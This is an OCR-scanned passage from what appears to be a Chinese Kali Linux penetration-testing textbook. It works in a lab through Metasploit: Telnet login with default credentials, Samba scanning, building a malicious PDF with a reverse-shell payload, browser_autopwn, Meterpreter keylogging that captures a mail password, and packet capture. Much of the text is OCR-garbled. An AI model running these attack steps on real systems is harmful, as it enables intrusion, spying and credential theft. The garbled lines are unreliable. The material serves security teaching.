[*] Auxiliary module execution completed 


从 以 上 输出 的 信息 ， 仅 看 到 一 堆 文 本 信息 。 但 是 在 这 些 信息 中 可 以 看 到 ， 显 示 了 
Telnet 的 登 录 认 证 信息 Login with msfadmin/msfadmin to get started。 从 这 条 信息 
中 ， 可 以 得 知 目标 主机 Telnet 服 务 的 用 户 名 和 密码 都 为 msfadmin。 此 时 可 以 尝试 登 
Éo 


(4) 登录 目标 主机 的 Telnet 服 务 。 执 行 命 分 如 下 所 示 : 


root@kali:~# telnet -l msfadmin 192.168.6.105 

Trying 192.168.6.105.. 

Connected to 192.168.6.105. 

Escape character is '^]'. 

Password: # 输 入 密码 msfadmin 

Last login: Tue Jul 8 06:32:46 EDT 2014 on tty1 

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 U 
The programs included with the Ubuntu system are free software; 

the exact distribution terms for each program are described in the 
individual files in /usr/share/doc/*/copyright. 

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted | 
applicable law. 

To access official Ubuntu documentation, please visit: 
http://help.ubuntu.com/ 

No mail. 

msfadminQmetasploitable:-$ 


EE 


以 上 信息 显示 了 登录 Telnet 服 务 的 信息 。 在 会 出 信息 中 看 至 | 
msfadmin@metasploitable:~$ 提 示 符 ， 则 表示 成 功 登 录 了 Telnet 服 务 。 此 时 可 以 执 
行 一 些 标准 的 Linux 命 爷 。 例 如 ， 查 看 多 个 组 的 成 员 ， 执 行 命 爷 如 下 所 示 : 





msfadmin@metasploitable:~$ id 
uid-i1000(msfadmin) gid=1000(msfadmin) groups-4(adm),20(dialout),24! 


ajo 8E] 


输出 信息 中 显示 了 msfadmin 用 户 的 相关 信息 。 其 中 ，gid 表 示 groups 中 第 1 个 组 账号 
为 该 用 户 的 基本 组 ，groups 中 的 其 他 组 账号 为 该 用 户 的 附加 组 。 





6.4.5 渗透 攻击 Samba 服 务 


Samba 是 一 套 实现 SMB (Server Messages Block) 协议 、 跨 平台 进行 文件 共享 和 
打印 共享 服务 的 程序 。 Samba 服 务 对 应 的 闯 m6 139414455, REA 6 ix Eum] 
Jp, EWM REFHSambahks ic TEX. FANNA AENA E Sambalk 4 
ARo 

(1) ZMSF imo WIM A FPA : 


root@kali:~# msfconsole 
msf> 


(2) 使 用 smb_version 模 块 ， 并 查看 该 模块 可 配置 的 选项 参 效 。 执 行 命 分 如 下 所 
ZN : 


msf > use auxiliary/scanner/smb/smb version 
msf auxiliary(smb version) > show options 
Module options (auxiliary/scanner/smb/smb_version): 


Name Current Setting Required Description 

RHOSTS yes The target address range or CIDR identifier 
SMBDomain WORKGROUP no The Windows domain to use for authentication 
SMBPass no The password for the specified username 
SMBUser no The username to authenticate as 

THREADS 1 yes The number of concurrent threads 


(3) 配置 RHOSTS 选 项 。 执 行 合 分 如 下 所 示 : 


msf auxiliary(smb_version) > set RHOSTS 192.168.6.105 
RHOSTS => 192.168.6.105 


(4) 和 启动 扫 摘 。 执 行 命令 如 下 所 示 : 


msf auxiliary(smb_version) > exploit 

[*] 192.168.6.105:445 is running Unix Samba 3.0.20-Debian (language 
[^] Scanned 1 of 1 hosts (100% complete) 

[^] Auxiliary module execution completed 





从 输出 的 信息 中 ， 可 以 看 到 扫描 到 正在 运行 的 Samba 服 务 器 及 其 版 本 。 

在 Metasploit 中 使 用 smb_version 模 块 ， 还 可 以 指定 打 描 某 个 网 络 内 所 有 运行 Samba 
服务 器 的 主机 。 下 面 将 介绍 扫 摘 192.168.6.0/24 了 网 名 内 开启 Samba 服 务 器 的 所 有 主 
机 。 


(1) 选择 使 用 mb version 模 块 。 执 行 命 令 如 下 所 示 : 


msf > use auxiliary/scanner/smb/smb_version 


(2) 配置 smb_version 模 块 中 可 配置 的 选项 参数 。 执 行 命令 如 下 所 示 : 


msf auxiliary(smb_version) > set RHOSTS 192.168.6.0/24 
RHOSTS => 192.168.6.0/24 


msf auxiliary(smb_version) > set THREADS 255 
THREADS => 255 


(3) 和 启动 扫 摘 。 执 行 命令 如 下 所 示 : 


Sf auxiliary(smb_version) > exploit 

*] 192.168.6.106:445 is running Windows 7 Ultimate 7601 Service Pt 
*] 192.168.6.105:445 is running Unix Samba 3.0.20-Debian (language 
*] 192.168.6.104:445 is running Windows XP Service Pack 0 / 1 (lal 
*] 192.168.6.110:445 is running Windows XP Service Pack 0 / 1 (lal 
*] Scanned 255 of 256 hosts (099% complete) 

*] Scanned 256 of 256 hosts (100% complete) 

*] Auxiliary module execution completed 


ma Lee!) ee) Tm 3 
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从 输出 的 信息 中 ， 可 以 看 到 192.168.6.0/24 网 络 内 有 四 台 主 机 上 正在 运行 看 Samba 
服务 器 。 在 显示 的 信息 中 ， 可 以 看 到 运行 Samba 服 务 器 的 操作 系统 类 型 。 打 摘 到 开 
启 Samba 服 务 器 的 主机 后 ， 融 可 以 进行 渗透 攻击 了 。 





6.4.6 PDF 文件 攻击 


PDF 是 一 种 文件 格式 ， 该 文件 的 使 用 比较 广泛 ， 并 且 容 易 传输 。 通 党 在 工作 中 ， 用 
户 都 是 从 工作 程序 中 打开 了 一 个 合法 的 PDF 文档 。 当 打开 该 文档 时 ， 该 用 户 的 主机 
残 有 可 能 人 航 攻 击 。Metasploit 提 供 了 一 个 渗透 攻击 模块 ， 可 以 来 创建 一 个 攻击 载 
何 ， 通 过 传递 该 攻击 载 何 对 目标 系统 进行 渗透 攻击 。 本 小 节 将 介绍 创建 PDF 文件 攻 
击 载 何 。 


创建 PDF 文件 的 具体 操作 步骤 如 下 所 示 。 
(1) 和 启动 MSFCONSOLE。 执行 命令 如 下 所 示 : 


root@kali:~# msfconsole 


(2) #25RPTA AAYPDF ite. HATTA THO RAT : 


msf exploit(adobe pdf embedded exe) > search pdf 
Matching Modules 


Name Disclosure Date Hank Description 


auxiliary/admin/http/typo3 sa 2010 020 
Remote File 





normal TYPOS sa-20 10-020 


Disclosure 
auxiliary/admin/sap/sap configservlet exec 2012-11-01 normal SAP ConfigServiet OS 
Command 
noauth 00:00:00 UTC Execution 
auxiliary/admin/webmin/edit html fileaccess 2012-09-06 normal Webmin . edit html.cgi 
file Parameter 

00:00:00 UTC Traversal Arbitrary File 
Access 
auxiliary/dos/http/3com superstack switch 2004-06-24 normal 3Com SuperStack 
Switch Denial of 


00:00:00 UTC Service 
auxiliary/dos/http/hashcollision dos 2011-12-28 normal Hashtable Collisions 

00:00:00 UTC 
auxiliary/dos/scada/igss9 dataserver 2011-12-20 normal  7-Technologies IGSS 9 

00:00:00 UTC IGSSdataServer.exe 
Dos 
auxiliary/dos/upnp/miniupnpd dos 2013-03-27 normal | MiniUPnPd 1.4 Denial 
of Service (DoS) 

00:00:00 UTC Exploit 
exploit/windows/http/sap configservlet 2012-11-01 great SAP ConfigServlet 
Remote Code 
exec noauth Execution 


exploit/windows/http/sonicwall scrutinizer sqli 2012-07-22 excellent Dell SonicWALL (Plixer) 
Scrutinizer 9 

SQL Injection 
exploit/windows/misc/avidphoneticindexer 2011-11-29 normal Avid Media Composer 
5.5 - Avid 

Phonetic Indexer Buffer Overflow 
exploit/windows/misc/poisonivy bof 2012-06-24 normal Poison Ivy 2.32 C&C 
Server Buffer 


Overflow 
exploit/windows/fileformat/adobe pdf | 2010-03-29 excellent Adobe PDF Embedded 
EXE Social 
embedded exe Engineering 


exploit/windows/oracle/ins_service_name 2002-05-27 good Oracle 8i TNS Listener 
SERVICE NAME Buffer Overflow 

exploit/windows/postgres/postgres payload 2009-04-10 excellent PostgreSQL for 
Microsoft Windows 

Payload Execution 
exploit/windows/scada/labb wserver exec 2013-04-05 excellent ABB MicroSCADA 
wserver.exe 

Remote Code Execution 
exploit'windows/scada/citect scada odbc 2008-06-11 normal 

CitectSCADA/CitectFacilities ODBC 
Buffer Overflow 


以 上 输出 信息 显示 了 PDF 所 有 可 用 的 模块 。 此 时 可 以 选择 相应 模块 进行 配置 ， 配 置 
后 方便 进行 攻击 。 


(3) 使 用 Adobe PDF Embedded EXE 模 块 。 执 行 命 令 如 下 所 示 : 


msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe 


(4) #4 @adobe_ pdf embedded exe 模块 有 效 的 选项 。 执 行 命令 如 下 所 示 : 


msf exploit(adobe_pdf_embedded_exe) > show options 
Module options (exploit/windows/fileformat/adobe pdf embedded exe): 


Mame Current Setting Required Description 

EXENAME no The Name of payload exe. 
FILENAME evil. pdf no The output filename. 
INFILENAME yes The Input PDF filename. 

LAUNCH MESSAGE To view the encrypted content please tick the "Do not show this 


message again" box and press Open. 
no The message to display in the File: 
area 
Exploit target: 
ld Name 


0 Adobe Reader v8.x, v9.x (Windows XP SP3 English/Spanish) 


以 上 信息 显示 了 adobe pdf embedded exe 模块 所 有 可 用 的 选项 。 此 时 配置 必须 的 
选项 ， 然后 进行 渗透 攻击 。 


(5) 设置 用 户 想 要 生成 的 PDF 文 件 名 。 执 行 命 例如 下 所 示 : 


msf exploit(adobe_pdf_embedded_exe) > set FILENAME evildocument. pdi 
FILENAME => evildocument. pdf 


a I 


(6) 设置 INFILENAME 选 项 。 为 了 利用 ， 使 用 该 选项 指定 用 户 访问 的 PDF 文件 位 
iB. {Topped RAN : 


msf exploit(adobe pdf embedded exe) > set INFILENAME /root/Desktop, 
INFILENAME -» /root/Desktop/willie.pdf 


J DE S úO 


(7) 运行 exploit。 执 行 命 合 如 下 所 示 : 


wi 





msf exploit(adobe_pdf_embedded_exe) > exploit 

[*] Reading in '/root/Desktop/willie.pdf'... 

[^] Parsing '/root/Desktop/willie. pdf"... 

[*] Using 'windows/meterpreter/reverse_tcp' as payload... 

[*] Parsing Successful. Creating 'evildocument.pdf' file.. 

[+] evildocument.pdf stored at /root/.msf4/local/evildocument.pdf 


输出 的 信息 显示 了 evildocument.pdf 文 件 已 经 生成 ， 而 且 被 保存 到 /root/.msf4/local 
z 录 中 。 


6.4.7 使 用 browser autopwn 模 块 渗透 攻击 浏览 器 


Browser Autopwn 是 由 Metasploit 提 供 的 一 个 辅助 模块 。 当 访问 一 个 Web 页 面 时 ， 

它 允 许 用 户 自 动 地 攻击 一 个 人 侵 主 机 。Browser Autopwn 在 攻击 之 前 ， 会 先进 行 指 
纹 信 息 操作 ， 这 意味 着 它 不 会 攻击 Mozilla Firefox 浏 览 器 ， 而 只 会 攻击 系统 目 带 的 
Internet Explorer 7 浏览 器 。 本 小 节 将 介绍 browser_autopwn 模 块 的 使 用 。 


加 载 browser_autopwn 模 块 的 具体 操作 步骤 如 下 所 示 。 
(1) A#MSFCONSOLE, 14176543 AI RATA : 


root@kali:~# msfconsole 


(2) 查询 autopwn 模 块 。 


msf > search autopwn 
Matching Modules 


Name Disclosure Date Kank Description 


auxiliary/server/browser - autopwn normal HTTP Client Automatic Exploiter 
输出 的 信息 显示 了 有 一 个 autopwn 模 块 。 
(3) 使 用 browser_autopwn 模 块 。 执 行 命令 如 下 所 示 : 


msf > use auxiliary/server/browser_autopwn 


执行 以 上 命令 后 ， 没 有 任何 信息 输出 。 
(4) 设置 payload。 执 行 命 令 如 下 所 示 : 


msf auxiliary(browser_autopwn) > set payload windows/meterpreter/ | 
payload => windows/meterpreter/reverse_tcp 


(5) 查看 payload 的 选项 。 执 行 命令 如 下 所 示 : 


msf auxiliary(browser_autopwn) > show options 
Module options (auxiliary/server/browser autopwn): 





Name Current Setting Required Description 
LHOST 192. 168.41.234 yes The IP address to use for reverse-connect 
payloads 
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an 
address on the local machine or 0.0.0.0 
SRVPORT 8080 yes The local port to listen on. 
SSL false no Negotiate SSL for incoming connections 
SSLCert no Path to a custom SSL certificate (default is 
randomly generated) 
SSLVersion SSL3 no Specify the version of SSL that should be used 


(accepted: SSL2, 
SSL3, TLS1) 
URIPATH no The URI to use for this exploit (default is random) 


傅 出 的 信息 显示 了 payload 枢 块 的 选项 。 此 时 融 可 以 选择 需要 设置 的 选项 进 
E, 


(6) 配置 LHOST 选 项 。 执 行 命 令 如 下 所 示 : 


msf auxiliary(browser_autopwn) > set LHOST 192.168.41.234 
LHOST => 192.168.41.234 


以 上 输出 的 信息 表示 指定 本 地 主机 使 用 的 IP 地 址 是 192.168.41.234。 
(7) 配置 URIPATH 选 项 。 执 行 命 令 如 下 所 示 : 


msf auxiliary(browser_autopwn) > set URIPATH "filetypes" 
URIPATH => filetypes 


(8) 启用 渗透 攻击 。 执 行 命 分 如 下 所 示 : 


47 Ac 


msf auxiliary(browser_autopwn) > exploit 

[^] Auxiliary module execution completed 

[^] Setup 

[^] Obfuscating initial javascript 2014-04-30 19:00:49 +0800 

[^] Done in 0.718574284 seconds 

msf auxiliary(browser autopwn) > 

[^] Starting exploit modules on host 192.168.41.234.. 

MES 

[^] Starting exploit multi/browser/java atomicreferencearray with | 
[^] Using URL: http://0.0.0.0:8080/BjlwyiXpeQHIG 

[*] Local IP: http://192.168.41.234:8080/Bj IwyiXpeQHIG 

[^] Server started. 

[^] Starting exploit multi/browser/java jrei17 jmxbean with payload 
[^] Using URL: http://0.0.0.0:8080/NVVrXNZ 

[*] Local IP: http://192.168.41.234:8080/NVVrXNZ 

[^] Server started. 


EA AR... 


[* ] Started reverse handler on 192.168.41.234:6666 

[^] Started reverse handler on 192.168.41.234:7777 

[^] Starting the payload handler... 

[*] Starting the payload handler... 

[*] --- Done, found 16 exploit modules 

[*] Using URL: http://0.0.0.0:8080/filetypes 

[*] Local IP: http://192.168.41.234:8080/filetypes 

[*] Server started. 

[^] 192.168.41.146 browser_autopwn - Handling '/filetypes' # 访 问 
[*] 192.168.41.146 browser_autopwn - Handling '/filetypes' 

[^] Meterpreter session 1 opened (192.168.41.234:3333 -> 192.168.4: 
[^] Sending stage (769024 bytes) to 192.168.41.146 

[*] Session ID 1 (192.168.41.234:3333 -» 192.168.41.146:1071) proc: 
[+] Successfully migrated to process 

[^] Current server process: qjRc.exe (1824) 

[^] Spawning notepad.exe process to migrate to 

[+] Migrating to 1260 


a] F — E 用 


以 上 输出 信息 是 一 个 漏洞 攻击 过 程 。 此 过 程 中 输出 的 内 容 较 多 ， 由 于 篇 幅 的 原因 ， 
中 辣 部 分 内 容 使 用 省 略 号 (......) 取代 了 。 从 输出 的 过 程 中 看 到 客户 六 
192.168.41.146 访 问 了 192.168.41.234 主 机 ， 并 成 功 建 立 了 一 个 活跃 的 会 话 。 该 会 
话 是 由 客户 闯 访 问 后 产生 的 。 当 渗透 测试 启动 后 ， 在 客户? NIE a WE SEDA 

入 http:WIP Address:8080O/filetypes 访 问 主机 ， 将 产生 活跃 的 会 话 。 


(9) 从 第 (8) 步 的 输出 结果 中 可 以 看 到 ， 成 功 建立 的 会 话 ID 为 1。 为 了 激活 此 会 
话 ， 执 行 命 侈 如 下 所 示 : 





msf auxiliary(browser autopwn) > sessions -i 1 
[*] Starting interaction with 1.. 
meterpreter » 


从 输出 的 结果 中 可 以 看 到 ， 和 启动 了 交互 会 话 1 进 入 到 了 Meterpreter 命 信行 。 
(10) $& € BE: f1 E ]Meterpreteráp 45 7l] z&, uf 65 43 2 FHIZR : 


Core Commande 
mands 
p 
7 
background 
bgkill 
bglist 
bgrun 
channel 
close 


Description 





Help menu 

Backgrounds the current session 

Kills a background meterpreter script 

Lists running background scripts 

Executes a meterpreter script as a background thread 
Displays information about active channels 

Closes a channel 


disable unicode encoding Disables encoding of unicode strings 
enable unicode encoding Enables encoding of unicode strings 





exit Terminate the meterpreter session 
help Help manu 
info Displays information about a Post module 
interact Interacts with a channel 
irb Drop into irb scripting mode 
load Load one or more mélerpreter extensions 
migrate Migrate the server to another process 
quit Terminate the meterpreter session 
read Reads data from a channel 
resource Run the commands stored in a file 
run Execules a meterpreter script or Post module 
use Deprecated alias for ‘load’ 
write Writes data to a channel 
eet 省 酷 部 分 肉 容 
Stdapi: Networking Commands 
Command Description 
arp Display the host ARP cache 
getpraxy Display the current proxy configuration 
ifconfig Display interfaces 
ipconfig Display interfaces 
netstat Display the network connections 
partfwd Forward a local port to a remote service 
route View and modify the routing table 
Stdapi: System Commands 
Command Deer puo 
clearev Clear the event log 
drop token Relinquishes any active impersonation token. 
execute Execule a command 
getenv Get one or more environment variable values 
getpid Get the current process identifier 
getprivs Attempt to enable all privileges available to the current process 
getuid Get the user that the server is running as 
kill Terminate a process 
ps List running processes 
reboot Reboots the remote computer 
reg Modify and interact with the remote registry 
reveself Calls RevertToSelf() on the remote machine 
shall Drop into a system command shell 
shutdown shuts down the remote computer 
steal token Attempts to steal an impersonation token from the target process 
suspend Suspends or resumes a list of processes 
sysinfo Gets information about the remote system, such as OS 
Stdapi: User interface Commands 
Command Description 
enumdesktops List all accessible desktops and window stations 
getdesktop Get the current meterpreter desktop 
idletime Returns the number of seconds the remote user has been idle 
keyscan dump Dump the keystroke buffer 
keyscan start Start capturing keystrokes 
keyscan stop Stop capturing keystrokes 
screenshot Grab a screenshot of the interaclive desktop 
setdesktop Change the meterpreters current desktop 
uicti Control some of the user interface components 


Priv: Timestomp Commands 


Com mand 


-— i e — o — — o o o — 


Description 


timestomp Manipulate file MACE attributes 


合 出 的 信息 显示 了 Meterpreter 命 令 行 下 可 运行 的 所 有 命令 。 输 出 的 信息 中 ， 每 个 命 
全 的 作用 都 有 详细 的 描述 。 用 户 可 以 根据 自己 的 情况 ， 执 行 相应 的 命 合 。 


(11) 启动 键盘 输入 ， 执 行 命令 如 下 所 示 : 


meterpreter > keyscan_start 
Starting the keystroke sniffer... 


(12) 获取 键盘 输入 信息 ， 执 行 命 分 如 下 所 示 : 


meterpreter > keyscan_dump 
Dumping captured keystrokes... 
«Back» «Back» «Back» «Back» <N1> <NO> «Ni» «N2» «NO» <N7> <N3> «N5: 


| ——— | m m m m m mm mmm mmm mm m m m m m m m mmm m m m m m m m m m mmm m m m m m m m m m m m mmm m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m 


ia HESS RÀ ERS S P mE RAPA AS. Wis iv] f mail.qq.comMius, 
登录 的 邮箱 地 址 为 1234567891， 密 码 为 123456。 





6.4.8 在 Metasploit 中 捕获 包 


在 Metasploit 中 ， 通 过 使 用 模块 进行 渗透 攻击 可 以 获取 到 一 个 Meterpreter Shell。 在 
Melerpreter Shel 中 可 以 捕获 目标 系统 中 的 数据 包 。 下 面 将 介绍 如 何在 Metasploit 
中 捕获 效 据 包 。 


(1) 首先 要 确定 获取 到 一 个 活路 的 会 话 ， 并 有 一 个 连接 到 目标 主机 的 Meterpreter 
Shell。 下 面 是 Windows 7 连接 到 攻击 主机 的 一 个 Meterpreter Shell, 3H FATA : 


msf exploit(handler) > exploit 

[^] Started reverse handler on 192.168.6.103:4444 

[^] Starting the payload handler... 

[^] Sending stage (769536 bytes) to 192.168.6.110 

[^] Meterpreter session 1 opened (192.168.6.103:4444 -> 192.168.6.: 
meterpreter » 


加 si 


从 输出 的 信息 中 ， 可 以 看 到 成 功 的 打开 了 一 个 Meterpreter 会 话 。 接 下 来 ， 就 可 以 使 
Hrun packetrecorder 命 全 捕获 目标 系统 的 数据 已 了。 


(2) 查看 packetrecorder 命 令 的 参数 。 执 行 命 令 如 下 所 示 : 





meterpreter > run packetrecorder 
Meterpreter Script for capturing packets in to a PCAP file 
on a target host given a interface ID. 
OPTIONS: 
-h Help menu. 
-1 <opt> Interface ID number where all packet capture will be dor 
-] «opt» Specify and alternate folder to save PCAP file. 
-li List interfaces that can be used for capture. 
-t <opt> Time interval in seconds between recollection of packet, 


4) s i 





以 上 输出 的 信息 显示 run packetrecorder 命 全 的 作用 和 可 用 选项 参数。 在 捕获 数据 
前 ， 首 先 要 指定 捕获 接口 。 所 以 ， 需 要 查看 主机 中 可 用 的 捕获 接口 。 


(3) 查看 可 用 的 捕获 网 络 接口 。 执 行 命 分 如 下 所 示 : 


meterpreter > run packetrecorder -li 
1 - 'VMware Accelerated AMD PCNet Adapter ( type:0 mtu:1514 usable 


[lp pe——————————— P (X — 5$ 
从 输出 的 信息 中 ， 可 以 看 到 只 有 一 个 网 络 接口 。 


(4) 指定 捕获 接口 开始 捕获 数据 ， 并 将 捕获 的 文件 保存 到 果 面 上 上。 执行 命令 如 下 
BER : 





meterpreter > run packetrecorder -i 1 -1 /root/Desktop 

[^] Starting Packet capture on interface 1 

[+] Packet capture started 

[^] Packets being saved in to /root/Desktop/logs/packetrecorder/ A/ 
[^] Packet capture interval is 30 Seconds 


^C 
[*] Interrupt 
[+] Stopping Packet sniffer.. 


执行 以 上 命 合 后 ， 闻 开始 捕获 目标 主机 的 数据 。 捕 获 的 文件 将 会 保存 到 指定 位 置 的 
一 个 logs 目 录 中 。 以 上 捕获 过 程 不 会 自动 停止 ， 如 果 要 停止 ， 则 按 下 Ctrlt+C 组 合 
键 。 


在 Metasploit 中 捕获 的 数据 包 ， 可 以 使 用 Wireshark 工 具 打 开 并 进行 分 析 。 在 Kali 
LinuxFB, SUA E22 ZS T Wireshark LS. 


【实例 6-3】 下 面 演示 使 用 Wireshark 工 具 ， 打 开 捕 获 的 文件 。 具 体操 作 步 骤 如 下 所 
小 \o 


(1) 启动 Wireshark， 使 它 在 后 侣 运行。 执行 命 全 如 下 所 示 : 
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root@kali:~# wireshark & 


或 者 在 图 形 界面 依次 选择 “应 用 程序 "|Kali Linux|Top 10 Security Tools|wiresharkép 


令 ， 将 显示 如 图 6.16 所 示 的 界面 。 


. Lua: Error during Loading: 
[string "/usr/share/wireshark/init.lua"]:46: dofile has been disabled due to running 
Wireshark as superuser. See http://wiki.wireshark.org/CaptureSetup/ 


CapturePrivileges for help in running Wireshark as an unprivileged user. 














| 确定 (0) 





图 6.16 警告 信息 


(2) 该 界面 显示 的 警告 信息 是 因为 当前 使 用 超级 用 户 运 行 该 程序 的 。 此 时 单 击 “人 确 


定 ” 按 钮 ， 将 显示 如 图 6.17 所 示 的 界面 。 


The Wireshark Network Analyzer [Wireshark 1.10.2 (SVN Rev 51934 from —n5| x 


File Edit View Go Capture Analyze Statistics Telephony Tools Internals Help 


COALA Oxa e» a t st a 





Filter: w | Expression... w 


= The World's Most Popular Network Proto 
WIRESHARK Version 1.10.2 (SVN Rev 51934 from /trunk-1.10) 


es RNNNNENI 








_ Interface List = Open 
= Live list of the capture interfaces Opena previously captured file 
(counts incoming packets) 


Open Recent: 
' Start 


| froot/Desktop/logs/p ... 7.0855/A/ 
Choose one or more interfaces to capture from, then Start 


frootiMecsktoan/lans!n 7 SANAIAI 





Ready to load or capture "| Profile: Default 


图 6.17 Wireshark 主 界面 


(3) 该 界面 就 是 Wireshark 的 主 界面 。 此 时 在 菜单 栏 中 依次 选择 File|Open 命 分 ， 选 


择 要 打开 的 捕获 文件 。 打 开 捕 获 文件 ， 界 面 如 图 6.18 所 示 。 


6.4 DEN 5 FH 
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AA-BB860KJM26F5W.20140717.5608.cap [Wireshark 1.10.2 (SVN Rev 51934 from /trunk-1.10]] — 


File Edit View Go Capture Analyze Statistics Telephony Tools Internals Help 


6048N sc iat ee@ eh Fs OB sear ~ 














Filter: ftp ~ | Expression. Clear Apply TF 
Mà. Time Source Destination Protocol Lengtl lInfa 
19 5.888888 192.158.5.117 192.1568.5.118 FTE 74 Response: 220 (vsFTPd 2.2.2) 
27 9.008088 — 197.158.6.118 192.168.5.112 Fre 78 Request: USER anonymous 
29 9.888088 . 192.168.6.117 192.168.6.118 FTE &B Response: 331 Please specify the password. 
7B 11.080888  192.168.6.118 192.1568,6.112 FTP BB Request: PASS mozillagexample.com 
79 11.080080  1592.168.5.11] 1927.168.6.118 FTF 77 Response: 230 Login successful. 
95 74.000000  192.168.6.118 192.168.6,112 FTP Bi Request: PORT 192,168,6,110,11,54 
96 ]4,880800  192.168.6.117 197,168,6.118 FTP 185 Response: 200 PORT command successful. Consider using 
97 2.000000 )192.163.56.118 FTP EH Request: LIST 
161 24.000000  192.168.6.117 197.168.6.118 FTP 93 Response: 150 Here comes the directory listing. 
185 24.000000  192.168.6.117 197.168.,6,118 FIP Td Response: 226 Directory send OK. 
111 26.000000  132.168.6.118 192.158.6.112 FTP 63 Request: CWD pub 
112 26.000000  192.163.6.117 ETP $1 Response: 250 Directory successfully changed. 


118 28.000008  197.163.6.118 192.158,5.117 $8 Request: PORT 192,168,6,110,11,55 









178 28.800000  197.168.6.118 192.168.6.112 FIP 68 Request: LIST 
124 28.880800  192.168.6.112 192.168.6.118 FTP $3 Response: 150 Here comes the directory listing. 
128 28.880888  192.168.6.112 192.168.5.118 FTP 7B Response: 226 Directory send OK. 

e "f File: "Iroot/Desktop/logs/packetre. : Packets: 131- Displayed: 17 (13.0%) -... Profile: Default 




















56.18 捕获 的 数据 包 


(4) 从 该 界面 可 以 看 到 捕获 的 所 有 数据 包 。 在 Wireshark 中 ， 还 可 以 通过 使 用 各 种 
显示 过 滤器 过 滤 一 类 型 的 数据 包 。 如 果 想 查看 一 个 完整 的 会 话 ， 右 键 单 击 任 何 一 行 
并 选择 Follow TCP Stream 命 令 查 看 ， 如 图 6.19 所 示 。 


Follow TCP Stream Lesa = x 


Stream Content 
220 (vsFTPd 2.2.2) 
, anonymous 
331 Please specify the password. 
PASS mozilla@example.com 
230 Login successful. 
PORT 192,168,6,110,11,54 
200 PORT command successful. Consider using PASV. 
IST 
= Here comes the directory listing. 
226 Directory send OK. 
pub 
250 Directory successfully changed. 
T 192, 168,6, 110,11,55 _ 
200 PORT command successful. Consider using PASV. 








IST 
iso Here comes the directory listing. 
226 Directory send OK. 


Entire conversation (457 bytes) v 


查找 (F) | 男 存 为 (A) | 打印 (P) ^" ASCII © EBCDIC ^" Hex Dump © C Arrays @ Raw 





帮助 (H) Filter Out This Stream | 关闭 (C) | 





图 6.19 FTP 会 话 


(5) 该 界面 显示 了 一 个 完整 的 FTP 会 话 。 如 登录 FTP 服 务 器 的 用 户 名 、 密 码 、 痕 口 
及 访问 的 目录 等 。 
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在 Kali 中 ， 可 以 使 用 Xplico 工 具 分 析 Wireshark 捕 获 的 文件 。 但 是 ， "E 
^i xE.pcape iX IL ESUGATEKaliFB HE. PBARRAALEAR. FST 
装 并 使 用 Xplico 工 具 分 析 数 据 包 。 


安装 Xplico 工 具 。 执 行 命令 如 下 所 示 : 


root@kali:~# apt-get install xplico 


JutzbA Eep mm, BTHREPRARSVE, MXpicoc Tr E5JJlb ZeXRXYI f» 2L 
还 需要 将 Xplico 服 务 和 启动 ， 才 可 以 使 用 。 由 于 Xplico 基 于 Web 界 面 ， 所 以 还 需要 启 
动 Apache 2 服务 。 


启动 Apache 服 务 。 执 行 命 爷 如 下 所 示 : 


root@kali:~# service apache2 start 
[OK] Start web server: apache2. 


从 输出 的 信息 中 ， 可 以 看 到 Apache2 服 务 已 启动 。 


a TERT TR A. B sb Apache 2 服务 时 ， 可 能 会 出 现 [.…….] Starting web 
server: apache2apache2: Could not reliably determine the server's fully qualified 
domain name, using 127.0.1.1 for ServerNamef& &., 3xz& [A] 7j Apache 2 服务 器 的 
配置 文件 中 没有 配置 ServerName 选项 ， 该 信息 不 会 影响 Web 服 务 器 的 访问 。 


启动 Xplico 服 务 。 执行 命 分 如 下 所 示 : 


root@kali:~# service xplico start 
[....] Starting : XplicoModifying priority to -1 
. Ok 


从 以 上 输出 信息 ， 可 以 看 到 Xplico 服 务 已 成 功 启 动 。 现 在 束 可 以 使 用 Xplico 服 务 


Oo 


【实例 6-4】 使 用 Xplico 工 具 解 析 捕 获 的 pcap 文 件 。 具 体操 作 步 骤 如 下 所 示 。 
(1) 在 浏览 器 中 输入 http://localhost:9876， 将 打开 如 图 6.20 所 示 的 界面 。 





Aplico ..:Users:.. ~ Iceweasel 


File Edit View History Bookmarks Tools Help 


|  Xplico ..:Users:.. | «iP | 
@ | @ localhost: 9876/use v i| ~ Google à ka eR 






















Most Visited’ [iJ Offensive Security “A Kali Linux "& Kali Docs KExploit-DB » 
Xplico Interface [^] 


Orin License: 
ad 


Ll 


- Language-- + 
Please login 
Forum 
Licenses Username 

xplico 
Password 

ft tt & & d 


Login 








p a) E 
6.20 Xplicot 3 FA 


(2) 该 界面 用 来 登录 Xplico 服 务 。Xplico 默 认 的 用 户 名 和 密码 都 是 xplico， 输 入 用 
户 名 和 密码 成 功 登 录 Xplico 后 ， 将 显示 如 图 6.21 所 示 的 界面 。 


Xplico ..:Pols:.. = lceweasel 


File Edit View History Bookmarks Tools Help 


| Xplico ..:Pols:.. | sie | 
“gl localhost v¥é ww " al a 2 


Most Visited" MOffensive Security "& Kali Linux “A Kali Docs BExploit-DB W Aircrack-ng 














Cases List | 
Name External Reference Type Actions 
| —— ---—€X- !UOO2—A——-——X—Y——— "i——máÁ—sg— sid » 


图 6.21 案例 列表 


(3) 从 该 界面 可 以 看 到 没有 任何 内 容 。 软 认 Xplico 服 务 中 ， 没 有 任何 案例 及 会 话 。 
需要 创建 案例 及 会 话 后 ， 才 可 以 解析 pcap 文 件 。 首 先 创 建 案例 ， 在 该 界面 单 击 左 侧 
栏 中 的 New Case 命 仿 ， 将 显示 如 图 6.22 所 示 的 界面 。 


Aplico ..:Pols:.. = Iceweasel 
File Edit View History Bookmarks Tools Help 
| E Xplico ..:Pols:.. | 59e | 
4 | & localhost dd v = | w jle s U^ e» 


B Most Visited" [Offensive Security "& Kali Linux '& Kali Docs MExploit-DB W Aircrack-ng 





Xplico Interface 
t FF Ms Ly | 





| New Case 





DATA ACQUISITION 
* Uploading PCAP capture file/s Live acquisition 


Case name Tesi 
External reference | 


Create 





[em li EPI 





图 6.22 新 建 案例 


(4) 在 该 界面 选择 Uploading PCAP capture file/s， 并 指定 案例 名 。 本 例 中 设置 为 
Test， 然 后 单 击 Create 按 钮 ， 将 显示 如 图 6.23 所 示 的 界面 。 


Xplico ..:Pols:.. = Iceweasel 
File Edit View History Bookmarks Tools Help 
